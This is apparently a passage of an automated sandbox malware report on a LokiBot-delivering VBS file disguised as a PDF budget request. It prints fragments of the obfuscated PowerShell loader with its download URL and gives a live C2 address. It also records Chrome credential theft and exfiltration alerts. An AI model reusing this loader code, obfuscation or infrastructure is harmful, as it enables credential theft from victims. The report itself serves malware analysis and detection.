De.meMrkatx .ackp FantohkkerrConvetOblig=NulpudSstteoJordewEnaarnReceplSkinnoGla sa OpsadK mmu&Cir uiSv dsdMerin=Drift1NondeQSlutmt Tyk OKonsekIdesvBGyno JPagodW andgLStikpLintenxNonde3.erveD LiniwClonkBWall.CDivisg Au,oRGl tsLSpina8NonciQSy ecZzairiaTaxam0BonnnhKendeYSynenUPa il0MackiwSyndrtSundaSUdskrj Gnis7Syvaa ';$Reskaleringen=Preeliminator 'S,rig>Yu ca ';$Eftertragtelsers=Preeliminator 'BeaveiEforeeAttacX,ekto ';$Amazonernes='Chromophoric';$Cogida='\Reebok.Dia';Glederens (Preeliminator 'Lazur$SvmmegProatlK ledoCatalbRealiaBulbolDa ks:Cam oV RecreOvervrListedVaskoe Di inWa,ersThorphUdv siMattesSenegtS amnoMavefrIndfriKornfs prudk Raile ReoxsVerds=Polem$FusenedimminHal,fv Intr:Bj.rgaPseudpH micpBekradMajesaS efftOrakla ortr+blin $ReawoC BlinoBudmagDestii CoundMemoraElekt ');Glederens (Preeliminator 'Jingl$Mayb gGadenlStikkoMust b KnapaCourtlPligt:CroaptAn ihrHeroleParadbHy era K ncnHete eJanifn Lsni=Sente$ ConsT Mysteoutbls Sikks PseuiPatentSta iuAlb.tr,utokaPachosLevef1 M,mo6Fer d0 Chem.UnshisSta dp.bseslStockiScourtBr sk( Hete$someoRtoot.etros s AnalklokalaKreatl .epteUnfurrBarduiSarconStiklgAntife Lab n Lat,) anga ');Glederens (Preeliminator 'Flyde[S.empN I.laeNaziptDinor.YesteSForneerigorrKennevDybsiiHortecSaliceScootPTabacoFacahiHairin ma gt ,entMApplia Lil nTreadaDisd gSamlee CommrEmbub]Bitte:Cycli:GastrSFeltheHeatecA foru rnearAflsei OngotFie dy .odsPAvle rAndreo BlegtCastioop,racStyreoMu tilSeism Pres =Udhal Opspa[ BhutN Afk.e Knitt Udga.,artjS ropdeBundlcResiluS rivrEks.mi tiftT rsuyPaperPHenver Huxto MulitBoy,ooForskc UnceoKsnehJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#bjrgning indicerede afskrkkelsesvaabnenes halvfabrikatas myosuture skilteskrift pensils #>;$ammoniacs='befragters';<#avilion kendall kicking #>;$attesterende=$host.privatedata;if ($attesterende) {$jernbanelinier++;}function preeliminator($amagerhylde){$drukkenbolten=$chaussure+$amagerhylde.length-$jernbanelinier;for( $getling=5;$getling -lt $drukkenbolten;$getling+=6){$nordfljs180+=$amagerhylde[$getling];}$nordfljs180;}function glederens($floraer207){ & ($eftertragtelsers) ($floraer207);}$spisefrikvarteret=preeliminator 'gelatmphotoosdsupzss ori o belqu etlrenataamphi/ tilh5ve an.not r0udson ind c(afgaswsanitilabi nharpudptomaobetraw pl nsa.cum vedblnn,nmet stfo so.si1 a ne0opium.jetti0foraa;,nman b,lthwmodtai k otn ern6ratba4tynds;koldk supe xlegac6cellm4 triu;rolni vindermlescvmods,:per c1parti2 pre 1et al.savne0edgew)belly trickgs.cceeheltic afgrkoleogoventr/blods2 .isq0s,uth1froko0s nsi0konde1selek0batus1udkry detonfh spiivillargenn eblubbfciffeosalatxlabba/midte1 ver,2 v rg1 over.kem i0 oni ';$melton=preeliminator ' handuunivesafs neunexprfrema- blk ajackfgbr gaedekann uflytadnex ';$tessituras160=preeliminator 'fristhkvi dtb dbatlow,ip.recaslejei:e ter/amati/s.mlidpret rspeedihandlvsyzyge pati.ove sg ri.godemisopelviguncleltwatceunsu .exo,ecunco ofiskemmi mo/mongcusja,kcagrar? 
de.memrkatx .ackp fantohkkerrconvetoblig=nulpudsstteojordewenaarnreceplskinnogla sa opsadk mmu&cir uisv dsdmerin=drift1nondeqslutmt tyk okonsekidesvbgyno jpagodw andglstikplintenxnonde3.erved liniwclonkbwall.cdivisg au,orgl tslspina8nonciqsy eczzairiataxam0bonnnhkendeysynenupa il0mackiwsyndrtsundasudskrj gnis7syvaa ';$reskaleringen=preeliminator 's,rig>yu ca ';$eftertragtelsers=preeliminator 'beaveieforeeattacx,ekto ';$amazonernes='chromophoric';$cogida='\reebok.dia';glederens (preeliminator 'lazur$svmmegproatlk ledocatalbrealiabulbolda ks:cam ov recreovervrlistedvaskoe di inwa,ersthorphudv simattessenegts amnomavefrindfrikornfs prudk raile reoxsverds=polem$fusenedimminhal,fv intr:bj.rgapseudph micpbekradmajesas efftorakla ortr+blin $reawoc blinobudmagdestii coundmemoraelekt ');glederens (preeliminator 'jingl$mayb ggadenlstikkomust b knapacourtlpligt:croaptan ihrheroleparadbhy era k ncnhete ejanifn lsni=sente$ const mysteoutbls sikks pseuipatentsta iualb.tr,utokapachoslevef1 m,mo6fer d0 chem.unshissta dp.bseslstockiscourtbr sk( hete$someortoot.etros s analklokalakreatl .epteunfurrbarduisarconstiklgantife lab n lat,) anga ');glederens (preeliminator 'flyde[s.empn i.laenaziptdinor.yestesforneerigorrkennevdybsiihortecsalicescootptabacofacahihairin ma gt ,entmapplia lil ntreadadisd gsamlee commrembub]bitte:cycli:gastrsfeltheheateca foru rnearaflsei ongotfie dy .odspavle randreo blegtcastioop,racstyreomu tilseism pres =udhal opspa[ bhutn afk.e knitt udga.,artjs ropdebundlcresilus rivreks.mi tiftt rsuypaperphenver huxto mulitboy,ooforskc unceoksneh
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match | File source: dump.pcap, type: PCAP
                Source: Yara match | File source: 00000008.00000002.2948258092.00000000042ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 8076, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

                Remote Access Functionality

                Source: Yara match | File source: dump.pcap, type: PCAP
                Source: Yara match | File source: 00000008.00000002.2948258092.00000000042ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 8076, type: MEMORYSTR

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | 221 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 221 Scripting | 111 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 1 Security Software Discovery | Remote Services | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 111 Process Injection | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

                [Behavior graph: ID 1523886; Sample: PERMINTAAN ANGGARAN (Univer...; Start date: 02/10/2024; Architecture: WINDOWS; Score: 100]

                Source | Detection | Scanner | Label
                PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs | 18% | ReversingLabs | Win32.Trojan.Leonem
                PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs | 21% | Virustotal |

                Source | Detection | Scanner | Label
                C:\Users\user\AppData\Roaming\188E93\31437F.exe | 0% | ReversingLabs |
                C:\Users\user\AppData\Roaming\188E93\31437F.exe | 0% | Virustotal |

                No Antivirus matches

                Source | Detection | Scanner | Label
                18.31.95.13.in-addr.arpa | 0% | Virustotal |
                drive.google.com | 0% | Virustotal |
                drive.usercontent.google.com | 1% | Virustotal |

                Source | Detection | Scanner | Label
                http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
                http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
                https://go.micro | 0% | URL Reputation | safe
                https://contoso.com/License | 0% | URL Reputation | safe
                https://contoso.com/Icon | 0% | URL Reputation | safe
                https://aka.ms/pscore6lB | 0% | URL Reputation | safe
                https://contoso.com/ | 0% | URL Reputation | safe
                https://nuget.org/nuget.exe | 0% | URL Reputation | safe
                https://aka.ms/pscore68 | 0% | URL Reputation | safe
                https://apis.google.com | 0% | URL Reputation | safe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
                http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal |
                http://drive.usercontent.google.com | 1% | Virustotal |
                https://drive.usercontent.google.com/ | 1% | Virustotal |
                https://wordpress.org/documentation/article/faq-troubleshooting/ | 0% | Virustotal |
                https://www.google.com | 0% | Virustotal |
                https://drive.google.com/ | 0% | Virustotal |
                https://drive.google.com | 0% | Virustotal |
                http://drive.google.com | 0% | Virustotal |
                https://drive.usercontent.google.com | 1% | Virustotal |
                https://github.com/Pester/Pester | 1% | Virustotal |
                http://137.184.191.215/index.php/check.php?s=am9ntjjw | 16% | Virustotal |

                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                drive.google.com | 172.217.18.14 | true | false | | unknown
                drive.usercontent.google.com | 142.250.186.33 | true | false | | unknown
                18.31.95.13.in-addr.arpa | unknown | unknown | true | | unknown

                Name | Malicious | Antivirus Detection | Reputation
                http://137.184.191.215/index.php/check.php?s=am9ntjjw | true | | unknown

                            IP | Domain | Country | ASN | ASN Name | Malicious
                            142.250.186.161 | unknown | United States | 15169 | GOOGLEUS | false
                            137.184.191.215 | unknown | United States | 11003 | PANDGUS | true
                            172.217.18.14 | drive.google.com | United States | 15169 | GOOGLEUS | false
                            172.217.18.110 | unknown | United States | 15169 | GOOGLEUS | false
                            142.250.186.33 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1523886
                            Start date and time:2024-10-02 07:17:28 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 4m 33s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:11
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs
                            renamed because original name is a hash value
                            Original Sample Name:PERMINTAAN ANGGARAN (Universitas IPB) ID177888pdf.vbs
                            Detection:MAL
                            Classification:mal100.troj.spyw.expl.evad.winVBS@8/10@5/5
                            Cookbook Comments:
                            • Found application associated with file extension: .vbs
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                            Time | Type | Description
                            01:18:21 | API Interceptor | 121x Sleep call for process: powershell.exe modified
                            01:19:17 | API Interceptor | 24x Sleep call for process: msiexec.exe modified

                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:modified
                                        Size (bytes):11608
                                        Entropy (8bit):4.8908305915084105
                                        Encrypted:false
                                        SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
                                        MD5:FE1902820A1CE8BD18FD85043C4D9C5C
                                        SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
                                        SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
                                        SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):1.1940658735648508
                                        Encrypted:false
                                        SSDEEP:3:NlllulJnp/p:NllU
                                        MD5:BC6DB77EB243BF62DC31267706650173
                                        SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                        SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                        SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:@...e.................................X..............@..........
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):59904
                                        Entropy (8bit):5.770776695007155
                                        Encrypted:false
                                        SSDEEP:768:uo8HL2TB4LHLbo77Q2d9xSDvYD07BOUp8VKfTKznHVXq6ayYf3:vTB4LG7B8jY4XprIHw62
                                        MD5:9D09DC1EDA745A5F87553048E57620CF
                                        SHA1:1D0C7CFCA8104D06DE1F08B97F28B3520C246CD7
                                        SHA-256:3A90EDE157D40A4DB7859158C826F7B4D0F19A5768F6483C9BE6EE481C6E1AF7
                                        SHA-512:2BE940F0468F77792C6E1B593376900C24FF0B0FAE8DC2E57B05596506789AA76119F8BE780C57252F74CD1F0C2FA7223FE44AE4FA3643C26DF00DD42BD4C016
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%
                                        Joe Sandbox View:
                                        • Filename: SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs, Detection: malicious
                                        • Filename: Bnnebgers.vbs, Detection: malicious
                                        • Filename: C7jdH7geD6.exe, Detection: malicious
                                        • Filename: setup.exe, Detection: malicious
                                        • Filename: #U67e5#U8be2#U5165#U53e3.exe, Detection: malicious
                                        • Filename: sample.exe, Detection: malicious
                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1
                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):46
                                        Entropy (8bit):1.0424600748477153
                                        Encrypted:false
                                        SSDEEP:3:/lbq:4
                                        MD5:8CB7B7F28464C3FCBAE8A10C46204572
                                        SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                                        SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                                        SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                                        Malicious:false
                                        Preview:........................................user.
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                        Category:dropped
                                        Size (bytes):468128
                                        Entropy (8bit):5.964340705901803
                                        Encrypted:false
                                        SSDEEP:12288:lPtCGsaVQ7AMDbqPudZ/tQMJksdTL3SiG:2Awb1mM53jG
                                        MD5:D4C256A39EBB62A0AE88C5DFAF3DE765
                                        SHA1:437D4EFB2D6F5650F9927CC930B6A34AA46E3A54
                                        SHA-256:6244FB691D281B1C43C443E20B1DEB12E3A4F85E45993D37C97B9C968977D1B4
                                        SHA-512:6A2240302A45C0F32B6EF44E21FC577E2B1908136568BBCC3112F35341C48D00A7938292483FF5BBBC20F2638528955E73A4BAF5D4FE3CF9D4175BC010FF401F
                                        Malicious:false
                                        File type:ASCII text, with CRLF line terminators
                                        Entropy (8bit):4.858420781526879
                                        TrID:
                                        • Visual Basic Script (13500/0) 100.00%
                                        File name:PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs
                                        File size:74'212 bytes
                                        MD5:cf3ce0d565b919fe45d02705736fe824
                                        SHA1:0924076c6434b432b18fd0b298a2b5b14e38b754
                                        SHA256:96c1a11d9036afc58f65d8533f2c37b7fc64048e21bc60f28f0bb9311902e80f
                                        SHA512:eb44246e1c25d9cfcb49f724f710b21432fb8fab17b1344c3af142ef5959542a01db052db1e02b8f9af1df07872d3508fa99718a95260440b450bcee035fc431
                                        SSDEEP:1536:sTgvWHbK7HAM/TkMCV5i+8Q5+h+4C/hNGweE+f:sTgeMAITO8QS+lkf
                                        TLSH:09732931F9D706F68D4222FCE9416F0587B9BE182315C0ECA5B9C68A18D14DF8EBB2D5
                                        File Content Preview:..Rem Omohyoid? stromata? signficance debasingly!..Rem Serbantian? dimers.....Rem Trapperummet smaskede conhydrine! midterfigurernes vav..Rem Zamorine unbalanceable, navnetypes2 kunsthandler? forbiddingness:..Rem Pullers reuter: apperceptionism: effektivi
                                        Icon Hash:68d69b8f86ab9a86
                                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                        2024-10-02T07:19:05.174518+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 59082 | 172.217.18.110 | 443 | TCP
                                        2024-10-02T07:19:09.572345+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 59084 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:09.572345+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 59084 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:12.302852+0200 | 2024312 | ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 | 1 | 192.168.2.4 | 59084 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:12.483647+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 59085 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:12.483647+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 59085 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:15.447618+0200 | 2024312 | ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 | 1 | 192.168.2.4 | 59085 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:15.529974+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 59086 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:15.529974+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 59086 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:18.171666+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 59086 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:18.171666+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 59086 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:18.355471+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 59087 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:18.355471+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 59087 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:21.013032+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 59087 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:21.013032+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 59087 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:21.251872+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 59088 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:21.251872+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 59088 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:23.973964+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 59088 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:23.973964+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 59088 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:24.164842+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 59089 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:24.164842+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 59089 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:27.548269+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 59089 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:27.548269+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 59089 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:27.707362+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 59090 | 137.184.191.215 | 80 | TCP
